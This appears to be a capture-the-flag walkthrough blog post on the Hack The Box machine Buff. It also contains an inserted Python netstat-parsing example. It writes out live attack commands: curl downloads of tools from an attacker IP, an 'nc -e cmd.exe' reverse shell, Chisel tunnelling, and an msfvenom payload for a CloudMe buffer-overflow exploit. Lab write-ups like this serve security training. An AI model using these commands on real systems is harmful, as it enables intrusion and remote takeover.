[HTB] Buff walkthrough

Although the box is rated as easy, it took me a lot of time.
I think there is something wrong with my port forwarding, but I finally managed to get root, which is something to celebrate.

0x00 Information collection

Using Nmap, it is easy to see that the target host has port 8080 open.
nmap -sS 10.10.10.198

A web service runs on it.
Visiting the site, the page at 10.10.10.198:8080/contact.php shows that it runs Gym Management Software 1.0.

0x01 Own user

Searching Exploit-DB turns up an unauthenticated RCE vulnerability in this web app.
https://www.exploit-db.com/exploits/48506
Download the script and run python rce.py 10.10.10.198:8080. This gives us a webshell.

With this webshell, owning user is easy: read the flag with this command.
type %userprofile%\desktop\user.txt

0x02 Own root

At this point, we would normally run some enumeration tools to collect system information and look for a privilege-escalation vector.
It’s a complicated job, and I won’t write it down.

I first run netstat -ano to see which ports the system has open.

I found that port 8888 is only available locally. Then I found the owning process by its PID.
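The netstat check above can be scripted. The following is an added example, not code from the original post or from the box: it parses constructed Windows `netstat -ano` output and reports TCP listeners bound only to a loopback address, which a port scan from the network never sees. The sample rows and PIDs are invented.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample of `netstat -ano` output; PIDs and extra rows are invented.
SAMPLE_NETSTAT = """Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2488
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6348
  TCP    10.10.10.198:8080      10.10.15.91:51022      ESTABLISHED     2488
  TCP    [::]:135               [::]:0                 LISTENING       876
  UDP    0.0.0.0:5353           *:*                                    1344
"""

LOOPBACK = {"127.0.0.1", "::1"}

@dataclass
class Socket:
    proto: str
    addr: str
    port: int
    state: str  # empty for UDP rows, which have no State column
    pid: int

def _split_endpoint(endpoint: str) -> Tuple[str, int]:
    # "127.0.0.1:8888" -> ("127.0.0.1", 8888); "[::]:135" -> ("::", 135)
    host, port = endpoint.rsplit(":", 1)
    return host.strip("[]"), int(port)

def parse_netstat_ano(text: str) -> List[Socket]:
    """Parse the rows of Windows `netstat -ano`, skipping banner and header."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            proto, local, _remote, state, pid = parts
        else:  # UDP rows carry no State column
            proto, local, _remote, pid = parts
            state = ""
        host, port = _split_endpoint(local)
        sockets.append(Socket(proto, host, port, state, int(pid)))
    return sockets

def loopback_only_listeners(sockets: List[Socket]) -> List[Socket]:
    """Listeners bound to loopback: usable on the host, invisible to a port scan."""
    return [s for s in sockets if s.state == "LISTENING" and s.addr in LOOPBACK]
```

On a real host, feed it the saved output of netstat -ano and match the reported PIDs against tasklist to see which service owns each loopback-only port.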

Searching Exploit-DB for CloudMe turns up a buffer-overflow vulnerability that allows remote command execution.
https://www.exploit-db.com/exploits/48389
To use this script, we need to forward port 8888.

Set up a simple HTTP server with Python, and use curl from the webshell to download some tools to the victim machine.
Run python3 -m http.server to start an HTTP server.
Then run curl -O 10.10.15.91:8000/nc.exe and curl -O 10.10.15.91:8000/chisel.exe from the webshell.

Get a reverse shell through nc.
Run nc -lvp 6666 to listen on the attacking machine.
Then run nc -e cmd.exe 10.10.15.91 6666 from the webshell.

Next, run ./chisel server -port 8080 --reverse to start the Chisel server side.
Then run chisel.exe client 10.10.15.91:8080 R:8888:127.0.0.1:8888 in the reverse shell.

This forwards the target's local port 8888 back to us through the reverse tunnel.

Then run msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.15.91 1999' -b '\x00\x0A\x0D' -f python -v payload to generate our payload.

Then replace the payload in the PoC script.
Run nc -lvp 1999 and run the script. The nc listener receives an administrator shell.

If you are an international friend who has seen my article: first of all, I’d like to thank you for coming, and then I hope you will forgive me for this Chinglish. Just for fun :)

Author: SNCKER
Article link: https://sncker.github.io/blog/2020/10/28/HTB-Buff-walkthrough/
Copyright: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit SNCKER's blog when reposting.